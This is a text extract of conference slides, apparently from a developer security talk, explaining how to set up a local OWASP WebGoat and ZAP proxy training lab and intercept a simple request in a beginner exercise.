![Page 52: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/52.jpg)
Thanks!
http://michael-coates.blogspot.com
@_mwc
![Page 53: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/53.jpg)
Virtual Security Training Lab Setup
![Page 54: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/54.jpg)
Software
• Vulnerable Server: OWASP’s Webgoat
• Proxy Tool - OWASP’s ZAP (Zed Attack Proxy)
• Browser
• Virtual Machine: OWASP Broken Web App VM
![Page 55: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/55.jpg)
Test Connectivity to VM
1. Open Browser
2. Browse to your VM ip (listed in VM login page), e.g. http://192.168.56.101
3. Should see OWASP BWA welcome page
4. Error? Check ip address of VM
![Page 56: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/56.jpg)
WebGoat
• Click First Link - OWASP WebGoat version 5.3.x
• Username / Password is guest / guest
![Page 57: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/57.jpg)
Understanding the Proxy
• Proxy is middle-man between browser and web server
• Assists with traffic manipulation & inspection
Diagram: Attacker's Browser -> Web Proxy -> Web Server
![Page 58: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/58.jpg)
Understanding the Proxy
Diagram: Your Computer (Primary OS): Browser -> Web Proxy; VM: Web Server
![Page 59: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/59.jpg)
Enabling Proxy
1.Open ZAP
2.Configure Firefox to use proxy
3.Resend Request
4.Confirm received by proxy
5.Forward to web server (vm)
![Page 60: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/60.jpg)
Using A Proxy
• ZAP - Configure to listen on 8080
![Page 61: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/61.jpg)
Set Firefox Proxy
• Set Firefox proxy to 8080
• Preferences -> Advanced -> Network -> Settings
• Set HTTP Proxy
• Important - clear "No Proxy for" line
![Page 62: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/62.jpg)
Confirm Setup Works
• Refresh Web Browser
• Go to ZAP
• See site in left-hand column
![Page 63: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/63.jpg)
Intercepting Traffic
• Add a "breakpoint" by right clicking on the page and choosing "Break..."
• Refresh the webpage - it will hang
• Modify the request as needed, then press the "Continue" button
![Page 64: Devbeat Conference - Developer First Security](https://reader033.vdocuments.us/reader033/viewer/2022061120/546c3ae9af795971298b4e70/html5/thumbnails/64.jpg)
"Hello World" of Proxies
• Lesson: General -> Http Basic
• Objective:
  • Enter your name into text box
  • Intercept with proxy & change entered name to different value
  • Receive response & observe modified value is reversed
Diagram: Attacker's Browser -> Web Proxy -> Web Server; the browser sends "Joe", the proxy changes it to "Sue", and the server's reply shows the reversed value "euS"